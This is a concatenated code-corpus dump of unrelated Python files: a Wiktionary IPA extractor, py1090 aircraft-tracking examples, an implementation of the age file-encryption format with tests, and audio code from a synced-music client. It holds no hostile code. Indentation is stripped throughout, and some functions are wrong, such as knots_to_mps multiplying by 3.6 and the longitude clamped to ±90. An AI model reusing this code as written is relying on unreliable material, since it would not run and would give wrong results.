# TODO r_fr_reg = re.compile(r'\{\{([^\-]*)\-[^\|]*rég\|([^\}]*)\}\}', re.UNICODE)
# Extract phonemes from the whole article
def parse_fr(title, text):
# Iterate over lines
results = []
for line in text.split('\n'):
# Check standard pronunciation definition
match = r_fr_pron_long.search(line)
if match is not None:
text = match.group(1)
pronunciation = match.group(2)
language = match.group(3)
result = (text, language, pronunciation)
results.append(result)
# Ready
return results
#
# German-specific parser
#
# Word/language header
# == Liebe ({{Sprache|Deutsch}}) ==
r_de_header = re.compile(r'\s*==\s*[^=]*?\s*\(\s*\{\{Sprache\|([^\}]*)\}\}\s*\)\s*==\s*', re.UNICODE)
# Common pronunciation definition
# {{Aussprache}}
# :{{IPA}} {{Lautschrift|aˈpʀɪl}}
# :{{IPA}} {{Lautschrift|ˈɔʁdoː}}, {{Pl.}} {{Lautschrift|ˈɔʁdineːs}}
# :{{IPA}} ''östlich:'' {{Lautschrift|səˈɾiə}}, ''westlich:'' {{Lautschrift|seˈɾia}}
# :{{IPA}} {{Lautschrift|ˈtʀiːbʊs}}, <!-- Spezialfall, NICHT löschen -->{{Pl.1}} {{Lautschrift|ˈtʀiːbuːs}}
r_de_ipa = re.compile(r'\:\{\{IPA\}\}\s*\{\{Lautschrift\|([^\}]+)\}\}', re.UNICODE)
# German names to ISO 639-1 Codes (used by Wikipedia)
m_de_languages = {
'Englisch' : 'en',
'Französisch' : 'fr',
'Deutsch' : 'de',
'Italienisch' : 'it',
'Latein' : 'la',
'Spanisch' : 'es'
# TODO handle more language codes
}
# Extract phonemes from the whole article
def parse_de(title, text):
# Iterate over lines
language = ''
results = []
for line in text.split('\n'):
# Check for header, update current word and language
match = r_de_header.search(line)
if match is not None:
language = match.group(1)
language = m_de_languages.get(language, '')
# Check standard pronunciation definition
match = r_de_ipa.search(line)
if match is not None:
pronunciation = match.group(1)
result = (title, language, pronunciation)
results.append(result)
# Ready
return results
#
# Italian-specific
#
# Language header
# == {{-it-}} ==
# == {{-la-}} ==
r_it_header = re.compile(r'\s*==\s*\{\{\-(.*?)\-\}\}\s*==\s*', re.UNICODE)
# Common pronunciation definition
# * {{IPA|/ˈkaː.za/|/ˈkaː.sa/}}
# {{IPA|/inforˈmatika/}}
# {{IPA|/'libero/}}
r_it_ipa = re.compile(r'\{\{IPA\|\/(.*?)\/.*?\}\}', re.UNICODE)
# Extract phonemes from the whole article
def parse_it(title, text):
# Iterate over lines
language = ''
results = []
for line in text.split('\n'):
# Check for header, update current word and language
match = r_it_header.search(line)
if match is not None:
language = match.group(1)
# Check standard pronunciation definition
match = r_it_ipa.search(line)
if match is not None:
pronunciation = match.group(1)
result = (title, language, pronunciation)
results.append(result)
# Ready
return results
#
# Main process
#
# Get local directory
here = os.path.dirname(os.path.realpath(__file__))
# Iterate over pages in a BZ2 Wikipedia/Wiktionary dump
def iterate(path):
with bz2.open(path) as file:
title = None
ns = None
text = None
# For each node
for action, elem in etree.iterparse(file):
tag = elem.tag
if '}' in tag:
tag = tag[tag.rindex('}') + 1:]
# Keep relevant information
if tag == 'title':
title = elem.text
elif tag == 'ns':
ns = elem.text
elif tag == 'text':
text = elem.text
# When a page is complete, export it
elif tag == 'page':
if title is not None and ns == '0' and text is not None:
yield title, text
title = None
ns = None
text = None
# Free memory
del elem.getparent()[0]
# Process Wiktionary dump and extract phonetic information
def process(lang):
# Select parser
parse = {
'en' : parse_en,
'fr' : parse_fr,
'de' : parse_de,
'it' : parse_it
}[lang]
# Assume latest dump in same directory
input_path = os.path.join(here, '%swiktionary-latest-pages-articles.xml.bz2' % lang)
# Open output CSV file
output_path = os.path.join(here, '%s.csv' % lang)
with io.open(output_path, 'w', newline='', encoding='utf-8') as output_file:
writer = csv.writer(output_file)
writer.writerow(['WORD', 'LANGUAGE', 'PRONUNCIATION'])
# Stream and parse input dump
for title, text in tqdm(iterate(input_path)):
results = parse(title, text)
results = {result for result in results if result[2] != ''}
for result in sorted(results):
writer.writerow(result)
# Standalone usage does the export process
if __name__ == '__main__':
import argparse
parser = argparse.ArgumentParser(description='Extract phonemes from Wiktionary BZ2 dump.')
parser.add_argument('language', help='language code (en, fr, de, it)')
args = parser.parse_args()
process(args.language)
``` |
{
"source": "jojonas/py1090",
"score": 3
} |
#### File: py1090/examples/example_helpers.py
```python
def calculate_map_bounds(lats, lons, fraction=1):
import numpy as np
latrange = np.max(lats) - np.min(lats)
lonrange = np.max(lons) - np.min(lons)
padding = fraction * max(latrange, lonrange)
result = {}
result['llcrnrlat'] = max(np.min(lats) - padding, -90)
result['urcrnrlat'] = min(np.max(lats) + padding, 90)
result['llcrnrlon'] = max(np.min(lons) - padding, -90)
result['urcrnrlon'] = min(np.max(lons) + padding, 90)
print(result)
return result
def example_data_file():
import sys, os.path
if len(sys.argv) > 1:
filename = sys.argv[1]
if not os.path.isfile(filename):
raise IOError("File '{filename:s}' does not exist.".format(filename=filename))
else:
filename = 'example_recording.txt'
if not os.path.isfile(filename):
raise IOError("Run example 'record_raw_to_file.py' to create a sample flight recording first.")
return filename
map_bounds = {
"europe": {
"urcrnrlat": 70,
"urcrnrlon": 40,
"llcrnrlat": 35,
"llcrnrlon": -15,
},
"usa": {
"urcrnrlat": 50,
"urcrnrlon": -65,
"llcrnrlat": 23,
"llcrnrlon": -125,
},
"canada": {
"urcrnrlat": 75,
"urcrnrlon": -55,
"llcrnrlat": 45,
"llcrnrlon": -140,
}
}
blacklist_hexidents = (
'406B88',
'400C7D',
'400584',
'405F12',
)
```
#### File: py1090/examples/plot_basemap_polar.py
```python
import sys, os.path
sys.path.append(os.path.join(os.path.dirname(os.path.realpath(__file__)), '..'))
import os.path
import math
from mpl_toolkits.basemap import Basemap
import numpy as np
import matplotlib.pyplot as plt
import py1090
from py1090.helpers import distance_between, bearing_between
from example_helpers import calculate_map_bounds, blacklist_hexidents, example_data_file
def basemap_plot_distances(filename, home):
# number of sections
N = 120
bins = np.zeros(N)
collection = py1090.FlightCollection()
#with py1090.Connection() as file:
with open(filename, 'r') as file:
collection.add_list(file)
for flight in collection:
if flight.hexident in blacklist_hexidents:
continue
for lat, lon, alt in flight.path:
bearing = bearing_between(home[0], home[1], lat, lon)
distance = distance_between(home[0], home[1], lat, lon)
if distance > 500e3:
print("Warning: coordinates", lat, ",", lon, "sent by plane", flight.hexident, "are very far away, skipping for now, you may consider blacklisting though.")
continue
bin = round(bearing * N / (2*math.pi)) % N
if distance > bins[bin]:
bins[bin] = distance
m = Basemap(projection='stere', resolution='i', lat_0=home[0], lon_0=home[1], width=bins.max()*2, height=bins.max()*2)
fig = plt.figure()
ax_map = fig.add_subplot(111)
m.drawcoastlines()
m.fillcontinents(color='white', lake_color='white')
m.drawcountries()
ax_polar = fig.add_axes(ax_map.get_position(), polar=True, frameon=False)
ax_polar.set_autoscale_on(False)
ax_polar.set_ylim(0, bins.max()/1000)
ax_polar.fill(np.linspace(0, 2*math.pi, N) - math.pi/2, bins/1000, alpha=0.5)
ax_polar.xaxis.set_ticklabels([])
plt.title("Maximal distance: {:.1f} km".format(bins.max() / 1000))
plt.show()
if __name__ == "__main__":
filename = example_data_file()
home = (50.775346, 6.083887)
basemap_plot_distances(filename, home)
```
#### File: py1090/examples/record_raw_to_file.py
```python
import sys, os.path
sys.path.append(os.path.join(os.path.dirname(os.path.realpath(__file__)), '..'))
import py1090
def record_positions_to_file(filename):
with py1090.Connection() as connection, open(filename, 'a') as file:
lines = 0
for line in connection:
message = py1090.Message.from_string(line)
if message.latitude and message.longitude:
file.write(line)
lines += 1
print("Recorded lines:", lines)
if __name__ == "__main__":
record_positions_to_file("example_recording.txt")
```
#### File: py1090/py1090/helpers.py
```python
import math
EARTH_RADIUS = 6371008.7714 # m
r"""The average earth radius :math:`R_0`. It is defined as the mean radius of the semi-axes.
The values are taken from the WGS 84 (World Geodetic System 1984) ellipsoid
`(definition of the Department Of Defense, Jan. 2000, p. 37) <http://earth-info.nga.mil/GandG/publications/tr8350.2/wgs84fin.pdf>`_ .
.. math::
R_0 = 6371008.7714 \mathrm{m}
"""
def distance_between(lat1, lon1, lat2, lon2):
r"""Calculates the distance between two locations, in meters, using the `Haversine <http://en.wikipedia.org/wiki/Haversine_formula>`_
formula.
The bearing between latitude, longitude: :math:`(\phi_1, \lambda_1)` and :math:`(\phi_2, \lambda_2)` is given by
.. math::
a = \sin^2(\frac{\phi_2 - \phi_1}{2}) + \cos(\phi_1) \cos(\phi_2) \sin^2(\frac{\lambda_2 - \lambda_1}{2})
d = 2 R_0 \cdot \mathrm{atan2}(\sqrt{a}, \sqrt{1-a})
The earth radius :math:`R_0` is taken to be :py:data:`py1090.helpers.EARTH_RADIUS`. The approximation of a spherical earth is made.
Args:
lat1 (float): :math:`\phi_1`, the latitude of the reference location
lon1 (float): :math:`\lambda_1`, the longitude of the reference location
lat2 (float): :math:`\phi_2`, the latitude of the target location
lon2 (float): :math:`\lambda_2`, the longitude of the target location
Returns:
float: the distance in meters.
"""
lambda1 = math.radians(lon1)
lambda2 = math.radians(lon2)
phi1 = math.radians(lat1)
phi2 = math.radians(lat2)
dphi = phi2-phi1
dlambda = lambda2-lambda1
a = math.pow(math.sin(dphi/2), 2) + math.cos(phi1)*math.cos(phi2)*math.pow(math.sin(dlambda/2), 2)
dsigma = 2*math.atan2(math.sqrt(a), math.sqrt(1-a))
distance = EARTH_RADIUS * dsigma
return distance
def bearing_between(lat1, lon1, lat2, lon2):
r"""Calculates the bearing angle between two locations, in radians.
The bearing between latitude, longitude: :math:`(\phi_1, \lambda_1)` and :math:`(\phi_2, \lambda_2)` is given by
.. math::
\mathrm{atan2}(\sin(\lambda_2 - \lambda_1) \cos(\phi_1), \cos(\phi_2) \sin(\phi_1) - \sin(\phi_2) \cos(\phi_2) \cos(\lambda_2 - \lambda_1))
Args:
lat1 (float): :math:`\phi_1`, the latitude of the reference location
lon1 (float): :math:`\lambda_1`, the longitude of the reference location
lat2 (float): :math:`\phi_2`, the latitude of the target location
lon2 (float): :math:`\lambda_2`, the longitude of the target location
Returns:
float: the bearing angle in radians, between :math:`-\pi` and :math:`\pi`.
"""
lambda1 = math.radians(lon1)
lambda2 = math.radians(lon2)
phi1 = math.radians(lat1)
phi2 = math.radians(lat2)
dphi = phi2-phi1
dlambda = lambda2-lambda1
bearing = math.atan2(math.sin(dlambda)*math.cos(phi1), \
math.cos(phi2)*math.sin(phi1)-math.sin(phi2)*math.cos(phi1)*math.cos(dlambda))
return bearing
def knots_to_kmh(knots):
"""Converts velocity in knots to velocity in km/h.
1 knot is 1 nm/h (nautical mile per hour) and 1.852 km/h.
Args:
knots (float): velocity in knots
Returns:
float: velocity in km/h
"""
return 1.852*knots
def knots_to_mps(knots):
"""Converts velocity in knots to velocity in m/s (meters per second).
1 knot is 1 nm/h (nautical mile per hour), 1.852 km/h and about 6.67 m/s.
Args:
knots (float): velocity in knots
Returns:
float: velocity in m/s
"""
kmh = knots_to_kmh(knots)
return 3.6*kmh
``` |
{
"source": "jojonas/pyage",
"score": 2
} |
#### File: age/algorithms/ssh_ed25519.py
```python
import typing
from age.algorithms.x25519 import _x25519_decrypt_file_key2, x25519_encrypt_file_key
from age.keys.agekey import AgePublicKey
from age.keys.ed25519 import Ed25519PrivateKey, Ed25519PublicKey
from age.primitives.hashes import sha256
from age.primitives.hkdf import hkdf
from age.primitives.x25519 import ECPoint, ECScalar, x25519_reduce, x25519_scalarmult
AGE_ED25519_LABEL = b"age-encryption.org/v1/ssh-ed25519"
def _tweak(ssh_key: bytes) -> ECScalar:
return x25519_reduce(ECScalar(hkdf(salt=ssh_key, label=AGE_ED25519_LABEL, key=b"", len=64)))
def ssh_ed25519_encrypt_file_key(
ed25519_public_key: Ed25519PublicKey, file_key: bytes
) -> typing.Tuple[bytes, ECPoint, bytes]:
ssh_key = ed25519_public_key.binary_encoding()
public_key_fingerprint = sha256(ssh_key)[:4]
age_public_key = ed25519_public_key.to_age_public_key()
pk_conv: ECPoint = age_public_key.public_bytes()
pk_conv_tweak: ECPoint = x25519_scalarmult(_tweak(ssh_key), pk_conv)
public_key = AgePublicKey.from_public_bytes(pk_conv_tweak)
derived_secret, encrypted_file_key = x25519_encrypt_file_key(public_key, file_key)
return public_key_fingerprint, derived_secret, encrypted_file_key
def ssh_ed25519_decrypt_file_key(
ed25519_private_key: Ed25519PrivateKey,
fingerprint: bytes,
derived_secret: ECPoint,
encrypted_file_key: bytes,
):
ssh_key = ed25519_private_key.public_key().binary_encoding()
expected_fingerprint = sha256(ssh_key)[:4]
if fingerprint != expected_fingerprint:
raise ValueError("Wrong SSH-ED25519 public key")
tweak = _tweak(ssh_key)
age_private_key = ed25519_private_key.to_age_private_key()
pk_conv: ECPoint = age_private_key.public_key().public_bytes()
pk_conv_tweak: ECPoint = x25519_scalarmult(tweak, pk_conv)
derived_secret_tweak = x25519_scalarmult(tweak, derived_secret)
salt = derived_secret + pk_conv_tweak
return _x25519_decrypt_file_key2(
private_key=age_private_key,
derived_secret=derived_secret_tweak,
encrypted_file_key=encrypted_file_key,
salt=salt,
)
```
#### File: age/algorithms/ssh_rsa.py
```python
import typing
from age.keys.rsa import RSAPrivateKey, RSAPublicKey
from age.primitives.hashes import sha256
from age.primitives.rsa_oaep import rsa_decrypt, rsa_encrypt
AGE_RSA_PADDING_LABEL = b"age-encryption.org/v1/ssh-rsa"
def ssh_rsa_encrypt_file_key(
public_key: RSAPublicKey, file_key: bytes
) -> typing.Tuple[bytes, bytes]:
public_key_fingerprint = sha256(public_key.binary_encoding())[:4]
encrypted_file_key = rsa_encrypt(
public_key=public_key, label=AGE_RSA_PADDING_LABEL, plaintext=file_key
)
return public_key_fingerprint, encrypted_file_key
def ssh_rsa_decrypt_file_key(
private_key: RSAPrivateKey, fingerprint: bytes, encrypted_file_key: bytes
) -> bytes:
expected_fingerprint = sha256(private_key.public_key().binary_encoding())[:4]
if fingerprint != expected_fingerprint:
raise ValueError("Wrong SSH-RSA public key")
return rsa_decrypt(
private_key=private_key, label=AGE_RSA_PADDING_LABEL, ciphertext=encrypted_file_key
)
```
#### File: age/algorithms/x25519_test.py
```python
import os
from age.algorithms.x25519 import x25519_decrypt_file_key, x25519_encrypt_file_key
from age.keys.agekey import AgePrivateKey
def test_x25519_algorithm():
key = AgePrivateKey.generate()
file_key = os.urandom(16)
args = x25519_encrypt_file_key(key.public_key(), file_key)
decrypted = x25519_decrypt_file_key(key, *args)
assert decrypted == file_key
```
#### File: src/age/cli_test.py
```python
import datetime
import io
import os.path
import sys
from contextlib import contextmanager
from unittest import mock
from cryptography.hazmat.primitives.asymmetric.x25519 import X25519PrivateKey
from pytest import raises
from age.cli import decrypt, encrypt, generate
TEST_KEY = <KEY>"
TEST_KEY_PUBLIC = "<KEY>"
TEST_KEY_RAW = bytes.fromhex("<KEY>")
TEST_PLAINTEXT = b"Hello World!"
TEST_CIPHERTEXT = (
b"age-encryption.org/v1\n-> X25519 FMqeTTh7zPNXRuBAfaqsxrKKT4RF71pRWIlNuYPiQHA\nCtufbJCyj2JplnG6Rg3RHy6rJOUOE+Rqv8RGWoYWXlg\n--- gY9WMTjF1pksYSXC7xCFZGpiQH8frzkzKj1EG6Ql+gI\n"
+ bytes.fromhex(
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaacb589584a3b51348f292714ab0d51537e404d9882f9b03aa3d7fedfd"
)
)
@contextmanager
def should_exit(code=1):
with raises(SystemExit) as wrapped_e:
yield
assert wrapped_e.type == SystemExit
assert wrapped_e.value.code == code
def fake_random(n):
# really bad random data (n times 0xaa byte)
return b"\xaa" * n
def test_generate(capsys):
gen_func = "cryptography.hazmat.primitives.asymmetric.x25519.X25519PrivateKey.generate"
with mock.patch(gen_func) as mock_generate, mock.patch("age.cli.datetime") as mock_datetime:
mock_datetime.now.return_value = datetime.datetime(2019, 11, 10, 10, 00, 00)
mock_datetime.side_effect = lambda *args, **kw: datetime.datetime(*args, **kw)
mock_generate.return_value = X25519PrivateKey.from_private_bytes(TEST_KEY_RAW)
generate()
captured = capsys.readouterr()
assert captured.out == TEST_KEY
def test_encrypt(capsysbinary, monkeypatch):
with mock.patch("os.urandom", fake_random):
encrypt(recipients=[TEST_KEY_PUBLIC], infile=io.BytesIO(TEST_PLAINTEXT))
captured = capsysbinary.readouterr()
assert captured.out == TEST_CIPHERTEXT
def test_encrypt_no_recipient(capsys):
with should_exit(1):
encrypt(infile=io.BytesIO(TEST_PLAINTEXT))
captured = capsys.readouterr()
assert captured.err != ""
def test_encrypt_to_tty():
with mock.patch("sys.stdout", return_value=False):
assert sys.stdout.isatty()
with should_exit(1):
encrypt([TEST_KEY_PUBLIC], infile=TEST_PLAINTEXT)
def test_decrypt(fs, capsysbinary):
keys_filename = os.path.expanduser("~/.config/age/keys.txt")
fs.create_file(keys_filename, contents=TEST_KEY)
decrypt(infile=io.BytesIO(TEST_CIPHERTEXT))
captured = capsysbinary.readouterr()
assert captured.out == TEST_PLAINTEXT
def test_decrypt_from_file(fs, capsysbinary):
keys_filename = os.path.expanduser("~/.config/age/keys.txt")
fs.create_file(keys_filename, contents=TEST_KEY)
ciphertext_filename = "/tmp/test.age"
fs.create_file(ciphertext_filename, contents=TEST_CIPHERTEXT)
with open(ciphertext_filename, "rb") as infile:
decrypt(infile=infile)
captured = capsysbinary.readouterr()
assert captured.out == TEST_PLAINTEXT
def test_decrypt_to_file(fs):
keys_filename = os.path.expanduser("~/.config/age/keys.txt")
fs.create_file(keys_filename, contents=TEST_KEY)
ciphertext_filename = "/tmp/test.age"
fs.create_file(ciphertext_filename, contents=TEST_CIPHERTEXT)
plaintext_filename = "/tmp/test.txt"
with open(plaintext_filename, "wb") as outfile, open(ciphertext_filename, "rb") as infile:
decrypt(outfile=outfile, infile=infile)
with open(plaintext_filename, "rb") as plaintext_file:
assert plaintext_file.read() == TEST_PLAINTEXT
```
#### File: src/age/file.py
```python
import io
import sys
import typing
from age.exceptions import UnknownRecipient
from age.format import Header, Recipient, dump_header, load_header
from age.keys.base import DecryptionKey, EncryptionKey
from age.primitives.hkdf import hkdf
from age.primitives.hmac import HMAC
from age.primitives.random import random
from age.recipients.helpers import decrypt_file_key, generate_recipient_from_key, get_recipient
from age.stream import stream_decrypt, stream_encrypt
__all__ = ["Encryptor", "Decryptor"]
HEADER_HKDF_LABEL = b"header"
PAYLOAD_HKDF_LABEL = b"payload"
class Encryptor(io.RawIOBase):
def __init__(self, keys: typing.Collection[EncryptionKey], stream: typing.BinaryIO):
self._stream: typing.BinaryIO = stream
self._file_key: bytes = random(16)
self._plaintext_buffer: bytes = b""
self._write_header(keys)
def writable(self):
return True
def write(self, data):
self._plaintext_buffer += data
return len(data)
def close(self):
if not self.closed:
self._encrypt_buffer()
super().close()
def _hkdf(self, label: bytes, salt: bytes = b"") -> bytes:
return hkdf(salt, label, self._file_key, 32)
def _write_header(self, keys):
header = Header()
for key in keys:
recipient = generate_recipient_from_key(key, self._file_key)
recipient_args, recipient_body = recipient.dump()
header.recipients.append(Recipient(recipient.TAG, recipient_args, recipient_body))
header_stream = io.BytesIO()
dump_header(header, header_stream, mac=None)
mac = HMAC(self._hkdf(HEADER_HKDF_LABEL)).generate(header_stream.getvalue())
dump_header(header, self._stream, mac=mac)
def _encrypt_buffer(self):
self._stream.write(b"\n")
nonce = random(16)
self._stream.write(nonce)
stream_key = self._hkdf(PAYLOAD_HKDF_LABEL, nonce)
ciphertext = stream_encrypt(stream_key, self._plaintext_buffer)
self._stream.write(ciphertext)
self._plaintext_buffer = b""
class Decryptor(io.RawIOBase):
def __init__(self, identities: typing.Collection[DecryptionKey], stream: typing.BinaryIO):
self._stream: typing.BinaryIO = stream
self._file_key: typing.Optional[bytes] = None
self._plaintext_stream: typing.Optional[typing.BinaryIO] = None
self._decrypt_header(identities)
self._decrypt_body()
def readable(self):
return True
def read(self, size=-1):
assert self._plaintext_stream is not None
return self._plaintext_stream.read(size)
def _hkdf(self, label: bytes, salt: bytes = b"") -> bytes:
assert self._file_key is not None
return hkdf(salt, label, self._file_key, 32)
def _decrypt_header(self, identities: typing.Collection[DecryptionKey]):
header, mac = load_header(self._stream)
recipients = []
for header_recipient in header.recipients:
try:
recipient = get_recipient(
header_recipient.type, header_recipient.arguments, header_recipient.body
)
except UnknownRecipient:
print(f"Ignoring unknown recipient type '{header_recipient.type}'", file=sys.stderr)
else:
recipients.append(recipient)
self._file_key = decrypt_file_key(recipients, identities)
header_stream = io.BytesIO()
dump_header(header, header_stream, mac=None)
HMAC(self._hkdf(HEADER_HKDF_LABEL)).verify(header_stream.getvalue(), mac)
# TODO: Should we try another identity if HMAC validation fails?
def _decrypt_body(self):
assert self._file_key is not None
nonce = self._stream.read(16)
assert len(nonce) == 16, "Could not read nonce"
stream_key = self._hkdf(PAYLOAD_HKDF_LABEL, nonce)
ciphertext = self._stream.read()
plaintext = stream_decrypt(stream_key, ciphertext)
self._plaintext_stream = io.BytesIO(plaintext)
self._plaintext_stream.seek(0)
```
#### File: age/primitives/encode_test.py
```python
import os
from pytest import raises
from .encode import decode, encode
def test_encode_types():
data = encode(b"Hello World!")
assert isinstance(data, str)
with raises(TypeError):
encode("Hello String :(")
def test_decode_types():
data = decode("SGVsbG8gV29ybGQh")
assert isinstance(data, bytes)
with raises(TypeError):
decode(b"Hello Bytes :(")
def test_encode():
encoded = encode(b"Hello World!")
assert encoded == "SGVsbG8gV29ybGQh"
def test_encode_decode():
data = os.urandom(256)
encoded = encode(data)
decoded = decode(encoded)
assert decoded == data
def test_decode_garbage():
assert decode("SGVsbG8gV29ybGQ!") == decode("SGVsbG8gV29ybGQ")
```
#### File: age/primitives/hkdf.py
```python
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.kdf.hkdf import HKDF
__all__ = ["hkdf"]
def hkdf(salt: bytes, label: bytes, key: bytes, len: int) -> bytes:
"""Derive a key of len `len` using HKDF (:rfc:`5869`) using HMAC SHA-256
:param salt: Salt
:param label: Label
:param key: Key
:param len: Length of key to generate
:returns: Key of length `len`
>>> key = hkdf(b'', b'label', b'secret', 16)
>>> len(key)
16
>>> key.hex()
'112fefb269ce7dcb2ea6c7e952c104c1'
"""
return HKDF(
algorithm=hashes.SHA256(), length=len, salt=salt, info=label, backend=default_backend()
).derive(key)
```
#### File: age/primitives/scrypt.py
```python
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives.kdf.scrypt import Scrypt
__all__ = ["scrypt"]
def scrypt(salt: bytes, N: int, password: bytes) -> bytes:
"""Derive a key from `password` and `salt`
For the choise of `N`, see `<https://blog.filippo.io/the-scrypt-parameters/>`_.
:param salt: Salt
:param N: Scrypt cost
:param password: Password
"""
kdf = Scrypt(salt=salt, length=32, n=N, r=8, p=1, backend=default_backend())
return kdf.derive(password)
```
#### File: age/recipients/scrypt.py
```python
import typing
from age.algorithms.scrypt import scrypt_decrypt_file_key, scrypt_encrypt_file_key
from age.keys.base import DecryptionKey, EncryptionKey
from age.keys.password import PasswordKey
from age.primitives.encode import decode, encode
from age.recipients.base import Recipient
class SCryptRecipient(Recipient):
TAG: str = "scrypt"
ENCRYPTION_KEY_TYPE: typing.Type[EncryptionKey] = PasswordKey
DECRYPTION_KEY_TYPE: typing.Type[DecryptionKey] = PasswordKey
def __init__(self, salt: bytes, log_cost: int, encrypted_file_key: bytes):
self.salt: bytes = salt
self.log_cost: int = log_cost
self.encrypted_file_key: bytes = encrypted_file_key
@classmethod
def generate(cls, password_key: EncryptionKey, file_key: bytes):
assert isinstance(password_key, PasswordKey)
salt, cost, encrypted_file_key = scrypt_encrypt_file_key(password_key, file_key)
return cls(salt, cost, encrypted_file_key)
@classmethod
def load(cls, args: typing.List[str], body: str):
return cls(decode(args[0]), int(args[1]), decode(body))
def dump(self) -> typing.Tuple[typing.List[str], str]:
return [encode(self.salt), str(self.log_cost)], encode(self.encrypted_file_key)
def decrypt(self, password_key: DecryptionKey) -> bytes:
assert isinstance(password_key, PasswordKey)
return scrypt_decrypt_file_key(
password_key, self.salt, self.log_cost, self.encrypted_file_key
)
```
#### File: age/recipients/ssh_rsa.py
```python
import typing
from age.algorithms.ssh_rsa import ssh_rsa_decrypt_file_key, ssh_rsa_encrypt_file_key
from age.keys.base import DecryptionKey, EncryptionKey
from age.keys.rsa import RSAPrivateKey, RSAPublicKey
from age.primitives.encode import decode, encode
from age.recipients.base import Recipient
class SSHRSARecipient(Recipient):
TAG: str = "ssh-rsa"
ENCRYPTION_KEY_TYPE: typing.Type[EncryptionKey] = RSAPublicKey
DECRYPTION_KEY_TYPE: typing.Type[DecryptionKey] = RSAPrivateKey
def __init__(self, fingerprint: bytes, encrypted_file_key: bytes):
self.fingerprint: bytes = fingerprint
self.encrypted_file_key: bytes = encrypted_file_key
@classmethod
def generate(cls, password_key: EncryptionKey, file_key: bytes):
assert isinstance(password_key, RSAPublicKey)
fingerprint, encrypted_file_key = ssh_rsa_encrypt_file_key(password_key, file_key)
return cls(fingerprint, encrypted_file_key)
@classmethod
def load(cls, args: typing.List[str], body: str):
return cls(decode(args[0]), decode(body))
def dump(self) -> typing.Tuple[typing.List[str], str]:
return [encode(self.fingerprint)], encode(self.encrypted_file_key)
def decrypt(self, password_key: DecryptionKey) -> bytes:
assert isinstance(password_key, RSAPrivateKey)
return ssh_rsa_decrypt_file_key(password_key, self.fingerprint, self.encrypted_file_key)
```
#### File: src/age/stream.py
```python
import math
from cryptography.hazmat.primitives.ciphers.aead import ChaCha20Poly1305
PLAINTEXT_BLOCK_SIZE = 64 * 1024
CIPHERTEXT_BLOCK_SIZE = PLAINTEXT_BLOCK_SIZE + 16
NONCE_COUNTER_MAX = 2 ** (8 * 11) - 1
def _pack_nonce(nonce: int, last_block: bool = False) -> bytes:
assert nonce <= NONCE_COUNTER_MAX, "Stream nonce wrapped around"
return nonce.to_bytes(11, byteorder="big", signed=False) + (b"\x01" if last_block else b"\x00")
def _chunk(data, size):
for i in range(0, len(data), size):
yield data[i : i + size]
def stream_encrypt(key: bytes, data: bytes) -> bytes:
assert len(key) == 32
aead = ChaCha20Poly1305(key)
blocks = math.ceil(len(data) / PLAINTEXT_BLOCK_SIZE)
encrypted = b""
for nonce, block in enumerate(_chunk(data, PLAINTEXT_BLOCK_SIZE)):
last_block = nonce == blocks - 1
packed_nonce = _pack_nonce(nonce, last_block=last_block)
encrypted += aead.encrypt(nonce=packed_nonce, data=block, associated_data=None)
return encrypted
def stream_decrypt(key: bytes, data: bytes) -> bytes:
assert len(key) == 32
aead = ChaCha20Poly1305(key)
blocks = math.ceil(len(data) / CIPHERTEXT_BLOCK_SIZE)
decrypted = b""
for nonce, block in enumerate(_chunk(data, CIPHERTEXT_BLOCK_SIZE)):
last_block = nonce == blocks - 1
packed_nonce = _pack_nonce(nonce, last_block=last_block)
decrypted += aead.decrypt(nonce=packed_nonce, data=block, associated_data=None)
return decrypted
```
#### File: age/utils/copy_doc.py
```python
def copy_doc(original_function):
"""Decorator to copy docstring from `original_function` to decorated function"""
def wrapper(func):
func.__doc__ = original_function.__doc__
return func
return wrapper
``` |
{
"source": "jojonas/synced-music",
"score": 3
} |
#### File: core/client/audio.py
```python
import threading
import wave
import Queue
import pyaudio
from ..util import audio as audio
from ..util import threads
class WaveFileWriter(object):
def __init__(self, logger, timer):
self.waveFile = wave.open("outwave.wav", "w")
self.waveFile.setnchannels(audio.CHANNELS)
self.waveFile.setsampwidth(audio.pyaudio.get_sample_size(audio.SAMPLE_FORMAT))
self.waveFile.setframerate(audio.SAMPLE_RATE)
def stop(self):
self.waveFile.close()
def start(self):
pass
def getEnqueued(self):
return 0
def enqueueSound(self, playAt, buffer):
self.waveFile.writeframes(buffer)
pass
class SoundDeviceWriter(threads.QStoppableThread):
def __init__(self, logger, timer):
threads.QStoppableThread.__init__(self, name="Client Audio")
self.paHandler = pyaudio.PyAudio()
self.stream = self.paHandler.open(format = audio.SAMPLE_FORMAT, channels = audio.CHANNELS, rate = audio.SAMPLE_RATE, output=True)
self.soundBufferQueue = Queue.Queue(-1) # infinite size
self.logger = logger
self.timer = timer
def run(self):
while not self.done():
try:
playAt, soundBuffer = self.soundBufferQueue.get(block=True, timeout=5.0)
deltaTime = playAt - self.timer.time()
if deltaTime > 0:
if deltaTime > 10.0:
continue
else:
self.logger.debug("Waiting for %f seconds.", deltaTime)
# Sleep, but don't "oversleep" a quit event. waitStop() sleeps at most deltaTime seconds and returns whether the thread will quit afterwards
sleepUntil = self.timer.time() + deltaTime
waitStopTime = deltaTime - 0.05
if waitStopTime > 0:
if self.waitStop(waitStopTime):
break
while self.timer.time() < sleepUntil:
pass
else: # deltaTime <= 0
# chop off samples that should have been played in the past
cropBytes = audio.secondsToBytes(-deltaTime)
self.logger.debug("Cropping %f seconds = %d bytes.", -deltaTime, cropBytes)
soundBuffer = soundBuffer[cropBytes:]
if self.stream != None:
self.stream.write(soundBuffer, exception_on_underflow=False)
except IOError as e:
self.logger.error("Sound could not be played. Exception error following.")
self.logger.exception(e)
except Queue.Empty:
self.logger.warning("Sound buffer queue empty.")
pass
except Exception as e:
self.logger.exception(e)
def __del__(self):
self.stream.stop_stream()
self.stream.close()
self.paHandler.terminate()
self.stream = None
def enqueueSound(self, playAt, buffer):
self.soundBufferQueue.put((playAt, buffer))
def getEnqueued(self):
return self.soundBufferQueue.qsize()
```
#### File: core/client/ui.py
```python
from PyQt4 import QtCore, QtGui
from ..util import log, metrix, ui
class Widget(ui.Widget):
def setup(self):
frmServerSelection = QtGui.QGroupBox("Server Selection", self)
layoutServerSelection = QtGui.QHBoxLayout(frmServerSelection)
lblServer = QtGui.QLabel("&Server / Host name:", frmServerSelection)
self.txtServer = QtGui.QLineEdit(frmServerSelection)
